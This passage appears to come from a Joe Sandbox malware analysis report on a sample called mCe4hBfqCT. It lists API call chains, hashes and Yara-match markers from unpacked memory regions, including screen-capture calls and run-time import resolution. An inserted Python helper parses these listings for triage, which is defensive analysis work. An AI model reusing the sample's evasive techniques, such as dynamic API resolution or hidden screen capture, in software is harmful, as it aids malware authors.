                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction ID: 42a5f730a30a1e1bd32152643fcb173ca3e37f5da6869ad4a1273d6a3801185d
                                                  • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                  • Instruction Fuzzy Hash: FF11B27760704243D699CB3ED8B46BAE7DDEAC7220B2DC6FAF0414B658D322E24D9604
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504249917.0000000002D29000.00000040.00000020.00020000.00000000.sdmp, Offset: 02D29000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_2d29000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction ID: 9e839b5f026795bf8b113b1b7de4ce0b000b579bcfdb3264783599d064fe13f9
                                                  • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                  • Instruction Fuzzy Hash: BF117C72340110AFDB44DE65DCE0FE673EAEB98264F298065ED08CB356D675EC42CB60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction ID: 09cbd17cd191a2f6732b514d5ba89ddc17ef5fef794b0c0c12c8e7089248c805
                                                  • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                  • Instruction Fuzzy Hash: A501F272B026008FDF31CF24CC04BAA33E9EB86206F0940E4E94A97285E370A8818B80
APIs
• DefWindowProcW.USER32(?,00000014,?,?), ref: 00402151
• GetClientRect.USER32(?,?), ref: 00402166
• GetDC.USER32(?), ref: 0040216D
• CreateSolidBrush.GDI32(00646464), ref: 00402180
• SelectObject.GDI32(00000000,00000000), ref: 00402194
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 0040219F
• SelectObject.GDI32(00000000,00000000), ref: 004021AD
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021C0
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021CB
• MulDiv.KERNEL32(00000008,00000000), ref: 004021D4
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021F8
• SelectObject.GDI32(00000000,00000000), ref: 00402206
• SetBkMode.GDI32(?,00000001), ref: 00402283
• SetTextColor.GDI32(?,00000000), ref: 00402292
• _wcslen.LIBCMT ref: 0040229B
APIs
• DestroyWindow.USER32(?), ref: 004025ED
• DefWindowProcW.USER32(?,00000204,?,?), ref: 004025FF
• ReleaseCapture.USER32 ref: 00402612
• GetDC.USER32(00000000), ref: 00402639
• CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026C0
• CreateCompatibleDC.GDI32(?), ref: 004026C9
• SelectObject.GDI32(00000000,00000000), ref: 004026D3
• BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 00402701
• ShowWindow.USER32(?,00000000), ref: 0040270A
• GetTempPathW.KERNEL32(00000104,?), ref: 0040271C
• GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402737
• DeleteFileW.KERNEL32(?), ref: 00402751
• DeleteDC.GDI32(00000000), ref: 00402758
• DeleteObject.GDI32(00000000), ref: 0040275F
• ReleaseDC.USER32(00000000,?), ref: 0040276D
• DestroyWindow.USER32(?), ref: 00402774
• SetCapture.USER32(?), ref: 004027C1
• GetDC.USER32(00000000), ref: 004027F5
• ReleaseDC.USER32(00000000,00000000), ref: 0040280B
• GetKeyState.USER32(0000001B), ref: 00402818
• DestroyWindow.USER32(?), ref: 0040282D
APIs
• GetCurrentThreadId.KERNEL32 ref: 03030C56
• Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 03030CBD
• Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 03030CDA
• Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 03030D40
• Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 03030D55
• Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 03030D67
• Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 03030D95
• Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 03030DA0
• __CxxThrowException@8.LIBVCRUNTIME ref: 03030DCC
• Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 03030DDC
APIs
• ___free_lconv_mon.LIBCMT ref: 0043A65C
  • Part of subcall function 004399AB: _free.LIBCMT ref: 004399C8
  • Part of subcall function 004399AB: _free.LIBCMT ref: 004399DA
  • Part of subcall function 004399AB: _free.LIBCMT ref: 004399EC
  • Part of subcall function 004399AB: _free.LIBCMT ref: 004399FE
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A10
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A22
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A34
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A46
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A58
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A6A
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A7C
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439A8E
  • Part of subcall function 004399AB: _free.LIBCMT ref: 00439AA0
• _free.LIBCMT ref: 0043A651
  • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
  • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
• _free.LIBCMT ref: 0043A673
• _free.LIBCMT ref: 0043A688
• _free.LIBCMT ref: 0043A693
• _free.LIBCMT ref: 0043A6B5
• _free.LIBCMT ref: 0043A6C8
• _free.LIBCMT ref: 0043A6D6
• _free.LIBCMT ref: 0043A6E1
• _free.LIBCMT ref: 0043A719
• _free.LIBCMT ref: 0043A720
• _free.LIBCMT ref: 0043A73D
• _free.LIBCMT ref: 0043A755
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                  • Instruction ID: 8150cfcbb8d97c1a634bb94bc0336974ffbd25353871f942fa72eec07d372a2d
                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                  • Instruction Fuzzy Hash: D4316E315002009EEB219B35D886B5B73E8FF58315F14A51FE4D9CA251DB7AED508B1A
                                                  APIs
                                                  • ___free_lconv_mon.LIBCMT ref: 0304A8C3
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C2F
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C41
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C53
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C65
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C77
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C89
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049C9B
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CAD
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CBF
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CD1
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CE3
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049CF5
                                                    • Part of subcall function 03049C12: _free.LIBCMT ref: 03049D07
                                                  • _free.LIBCMT ref: 0304A8B8
                                                    • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?), ref: 03043707
                                                    • Part of subcall function 030436F1: GetLastError.KERNEL32(?,?,0304A37F,?,00000000,?,00000000,?,0304A623,?,00000007,?,?,0304AA17,?,?), ref: 03043719
                                                  • _free.LIBCMT ref: 0304A8DA
                                                  • _free.LIBCMT ref: 0304A8EF
                                                  • _free.LIBCMT ref: 0304A8FA
                                                  • _free.LIBCMT ref: 0304A91C
                                                  • _free.LIBCMT ref: 0304A92F
                                                  • _free.LIBCMT ref: 0304A93D
                                                  • _free.LIBCMT ref: 0304A948
                                                  • _free.LIBCMT ref: 0304A980
                                                  • _free.LIBCMT ref: 0304A987
                                                  • _free.LIBCMT ref: 0304A9A4
                                                  • _free.LIBCMT ref: 0304A9BC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                  • String ID:
                                                  • API String ID: 161543041-0
                                                  • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                  • Instruction ID: b03988a2c345da1d1a2a6b3516da91575e4138540e66491af739945d3ecd4411
                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                  • Instruction Fuzzy Hash: 3331B3B56463069FDBA0EB38E841B96B3E8EF40390F198479E458CB250DF71EE60CB14
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                  • Instruction ID: 14d391df4236cd99baad955409263e6980f1ff06ffe499d5f8ebd119726a11a8
                                                  • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                  • Instruction Fuzzy Hash: 16C14772D40205BBDB20DB98CC46FDEB7F8AB4C708F15515AFA04FB282D6B59E418B64
                                                  APIs
                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424886
                                                    • Part of subcall function 00424B55: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,004245B9), ref: 00424B65
                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042489B
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004248AA
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004248B8
                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 0042492E
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042496E
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042497C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                  • String ID: 11@$pContext$switchState
                                                  • API String ID: 3151764488-3851367110
                                                  • Opcode ID: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                  • Instruction ID: b5099d2659ab5da3d856e1a370161b96529dd65552012442df5f2ab280934ec0
                                                  • Opcode Fuzzy Hash: 5099532818571cbbdf9efb1b5aa3717eeed6167c85065a7cf9a3e62c5dc9f912
                                                  • Instruction Fuzzy Hash: 1331E575B002249BCF04EF65D881A6E77B5FF84314F60446BE915A7382DB78EE05C798
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,0302F248,00000004,03027DA7,00000004,03028089), ref: 0302EF19
                                                  • GetLastError.KERNEL32(?,0302F248,00000004,03027DA7,00000004,03028089,?,030287B9,?,00000008,0302802D,00000000,?,?,00000000,?), ref: 0302EF25
                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0302F248,00000004,03027DA7,00000004,03028089,?,030287B9,?,00000008,0302802D,00000000,?,?,00000000), ref: 0302EF35
                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0302EF4B
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF61
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF78
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF8F
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EFA6
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EFBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2340687224-4050573280
                                                  • Opcode ID: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                  • Instruction ID: c76f96488dd42acea5aeb1412ae93a8249c1392cd2279393adbb43d2f680315f
                                                  • Opcode Fuzzy Hash: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
                                                  • Instruction Fuzzy Hash: 19217CB5905720BFD750AFB49C08AAABFECEF05B56F114A2AF141D7650CB7C8440CBA8
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C33,000000FF,?,0302F248,00000004,03027DA7,00000004,03028089), ref: 0302EF19
                                                  • GetLastError.KERNEL32(?,0302F248,00000004,03027DA7,00000004,03028089,?,030287B9,?,00000008,0302802D,00000000,?,?,00000000,?), ref: 0302EF25
                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0302F248,00000004,03027DA7,00000004,03028089,?,030287B9,?,00000008,0302802D,00000000,?,?,00000000), ref: 0302EF35
                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0302EF4B
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF61
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF78
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF8F
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EFA6
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EFBD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                  • String ID: advapi32.dll
                                                  • API String ID: 2340687224-4050573280
                                                  • Opcode ID: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                  • Instruction ID: 0f119c114cf7a57ca4392dd85cf56adc22267b9c96f4c05f98b5850593c1beca
                                                  • Opcode Fuzzy Hash: 568b270db7864284fcb8ae39da317007db6e00d9f6bba130ca6b7ecd6e9fa7a9
                                                  • Instruction Fuzzy Hash: 002160B5905720BBD750AFB4DC08AAABFECEF05B56F114A2AF141D7650CB7C9440CBA8
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,0302672B), ref: 030224D6
                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 030224E4
                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 030224F2
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,0302672B), ref: 03022520
                                                  • GetProcAddress.KERNEL32(00000000), ref: 03022527
                                                  • GetLastError.KERNEL32(?,?,?,0302672B), ref: 03022542
                                                  • GetLastError.KERNEL32(?,?,?,0302672B), ref: 0302254E
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 03022564
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03022572
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                  • String ID: kernel32.dll
                                                  • API String ID: 4179531150-1793498882
                                                  • Opcode ID: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                  • Instruction ID: 8c32455445fb8d732b2b87ca011359121f1c5b9a52471a738e7411a433b066b2
                                                  • Opcode Fuzzy Hash: e08c19642d7b700cf60faa8aebbbf92ec784f63dcc7f1ccf2d9f7600249f9a07
                                                  • Instruction Fuzzy Hash: 3211C2799023307FE750FFB4AC89ABBBEACAD41A127544926F401D6161EB78D540876C
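The function blocks above are easiest to act on when they are parsed rather than read. What follows is an added Python example, not part of the Joe Sandbox report and not Joe Sandbox's own code, that parses blocks laid out the way this section is: it collects each function's API references together with its Memory Dump Source, flags functions whose own calls pair LoadLibrary*/GetModuleHandle* with repeated GetProcAddress (the run-time import resolution shown in the advapi32.dll and kernel32.dll blocks, and flagged in the overview as "Contains functionality to dynamically determine API calls"), and lists Opcode IDs that occur in more than one dump source, as dff188c5... does in the PE-backed image at 00400000 and the non-PE-backed region at 03010000 that carries the Yara matches. The embedded sample text is constructed from lines in this section with argument lists shortened; the regexes, the LOADERS set, the min_resolves threshold and the field names are this example's assumptions, not a documented Joe Sandbox export format.

```python
# Added triage helper for Joe Sandbox function listings; not Joe Sandbox code.
# Assumed layout (not a documented export format): a block starts at an "APIs"
# line, API references read "• Name.MODULE(args), ref: 0040ABCD", and the dump
# source line reads "• Source File: ..., Offset: 03010000, based on PE: false".
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Dict, List, NamedTuple, Optional, Tuple

API_RE = re.compile(
    r"^[•*-]?\s*(?P<sub>Part of subcall function [0-9A-F]{8}:\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
DUMP_RE = re.compile(r"Source File:\s*\S+,\s*Offset:\s*(?P<offset>[0-9A-F]+),\s*based on PE:\s*(?P<pe>true|false)")
OPCODE_RE = re.compile(r"Opcode ID:\s*(?P<id>[0-9a-f]{64})")
# Module-loading calls; paired with GetProcAddress they resolve imports at run time.
LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
           "GetModuleHandleA", "GetModuleHandleW"}

class ApiCall(NamedTuple):
    name: str
    module: str
    args: Tuple[str, ...]  # recovered argument column; "?" marks an unknown
    ref: str               # call-site address
    is_subcall: bool       # listed under "Part of subcall function"

@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    offset: str = ""                  # base of the dump region
    pe_backed: Optional[bool] = None  # "based on PE: true/false"
    opcode_id: str = ""               # address-independent code hash

def parse_function_blocks(text: str) -> List[FunctionBlock]:
    """One FunctionBlock per "APIs" header; lines that match nothing are skipped."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
        elif cur is not None:
            api, dump, opc = API_RE.match(line), DUMP_RE.search(line), OPCODE_RE.search(line)
            if api:
                args = tuple(a.strip() for a in api["args"].split(",")) if api["args"] else ()
                cur.calls.append(ApiCall(api["name"], api["module"], args, api["ref"], api["sub"] is not None))
            elif dump:
                cur.offset, cur.pe_backed = dump["offset"], dump["pe"] == "true"
            elif opc:
                cur.opcode_id = opc["id"]
    return blocks

def dynamic_import_chains(blocks: List[FunctionBlock], min_resolves: int = 2) -> List[dict]:
    """Functions whose own (non-subcall) references load a module and then resolve exports by name."""
    findings = []
    for b in blocks:
        direct = [c for c in b.calls if not c.is_subcall]
        loaders = [c for c in direct if c.name in LOADERS]
        resolves = [c for c in direct if c.name == "GetProcAddress"]
        if loaders and len(resolves) >= min_resolves:
            # the module name string is recovered as the first argument of the loader call
            libs = sorted({c.args[0] for c in loaders if c.args and c.args[0] != "?"})
            findings.append({"offset": b.offset, "opcode_id": b.opcode_id,
                             "libraries": libs, "resolves": len(resolves)})
    return findings

def shared_opcode_ids(blocks: List[FunctionBlock]) -> Dict[str, List[Tuple[str, Optional[bool]]]]:
    """Opcode IDs found in more than one dump region, with each region's PE backing."""
    seen: Dict[str, set] = defaultdict(set)
    for b in blocks:
        if b.opcode_id:
            seen[b.opcode_id].add((b.offset, b.pe_backed))
    return {oid: sorted(w, key=lambda r: (r[0], str(r[1])))
            for oid, w in seen.items() if len({r[0] for r in w}) > 1}

# Constructed sample: lines abridged from the listings above (argument lists shortened).
SAMPLE_REPORT = """\
APIs
• LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064), ref: 0302EF19
• GetLastError.KERNEL32(?,0302F248,00000004), ref: 0302EF25
• LoadLibraryW.KERNEL32(advapi32.dll,?,0302F248), ref: 0302EF35
• GetProcAddress.KERNEL32(00000000,00447430), ref: 0302EF4B
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF61
• GetProcAddress.KERNEL32(00000000,00000000), ref: 0302EF78
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
• Opcode ID: 42b6543bbc8b29be41a8bf3c8b8dff5f6d345e4297bc09f77771cd86560ab435
APIs
• _free.LIBCMT ref: 00431E1A
  • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?), ref: 004334A0
• Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
APIs
• _free.LIBCMT ref: 03042081
  • Part of subcall function 030436F1: HeapFree.KERNEL32(00000000,00000000,?), ref: 03043707
• Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
• Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
"""

if __name__ == "__main__":
    parsed = parse_function_blocks(SAMPLE_REPORT)
    print(dynamic_import_chains(parsed), shared_opcode_ids(parsed), sep="\n")
```

Two points on reading the output. A shared Opcode ID means the same function body, ignoring addresses, was found both in the loaded image at 00400000 and in the region at 03010000 that is not backed by a PE on disk; with "Detected unpacking" in the signature list that is the expected picture, and pairing functions this way tells you which blocks in the unpacked region are plain runtime code and which deserve a look. The dynamic-import check is a lead, not a verdict: the kernel32.dll block above, which throws Concurrency::scheduler_resource_allocation_error when resolution fails, is runtime library code resolving kernel32 exports the same way, so review each hit against its API ID and strings. The argument column is the plugin's recovered stack values and contains unknowns ("?"), so the example reads only the loader's first argument, where the module name string appears.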
                                                  APIs
                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,004401AF), ref: 0043EEE5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: DecodePointer
                                                  • String ID: 11@$acos$asin$exp$log$log10$pow$sqrt
                                                  • API String ID: 3527080286-2461957735
                                                  • Opcode ID: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                  • Instruction ID: 47f9428d28cfd6d6d0fcc487ca1ad96a5e838d4e1f3ed62f9574ed722bc2da70
                                                  • Opcode Fuzzy Hash: c5a83a7c3a5692031bd98a2408cfaa5972c38f8111fe63a4894d5265efbafef3
                                                  • Instruction Fuzzy Hash: 1A51A07490160ADBCF14DFA8E6481AEBBB0FF0D300F6551A7E480AB255C7798D29CB1E
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419788
                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419792
                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00419799
                                                  • SafeRWList.LIBCONCRT ref: 004197B8
                                                    • Part of subcall function 00417787: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417798
                                                    • Part of subcall function 00417787: List.LIBCMT ref: 004177A2
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004197CA
                                                  • GetLastError.KERNEL32 ref: 004197D9
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197EF
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004197FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                  • String ID: eventObject
                                                  • API String ID: 1999291547-1680012138
                                                  • Opcode ID: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                  • Instruction ID: 74ee1ce6077461ea63ae9e00130f3aceb1e9566028cac9141ddd6988e3fa2b51
                                                  • Opcode Fuzzy Hash: f2fd52a031fb61bc76af8f85f01e8766478cf52a27c2f29204c16f3f9ad69e75
                                                  • Instruction Fuzzy Hash: 6511A075600105EACB14EFA5CC49FEF77B8AF00701F20012BF42AE21D1DB789E85866D
                                                  APIs
                                                  • _free.LIBCMT ref: 00431E1A
                                                    • Part of subcall function 0043348A: HeapFree.KERNEL32(00000000,00000000,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?), ref: 004334A0
                                                    • Part of subcall function 0043348A: GetLastError.KERNEL32(?,?,0043A118,?,00000000,?,00000000,?,0043A3BC,?,00000007,?,?,0043A7B0,?,?), ref: 004334B2
                                                  • _free.LIBCMT ref: 00431E26
                                                  • _free.LIBCMT ref: 00431E31
                                                  • _free.LIBCMT ref: 00431E3C
                                                  • _free.LIBCMT ref: 00431E47
                                                  • _free.LIBCMT ref: 00431E52
                                                  • _free.LIBCMT ref: 00431E5D
                                                  • _free.LIBCMT ref: 00431E68
                                                  • _free.LIBCMT ref: 00431E73
                                                  • _free.LIBCMT ref: 00431E81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
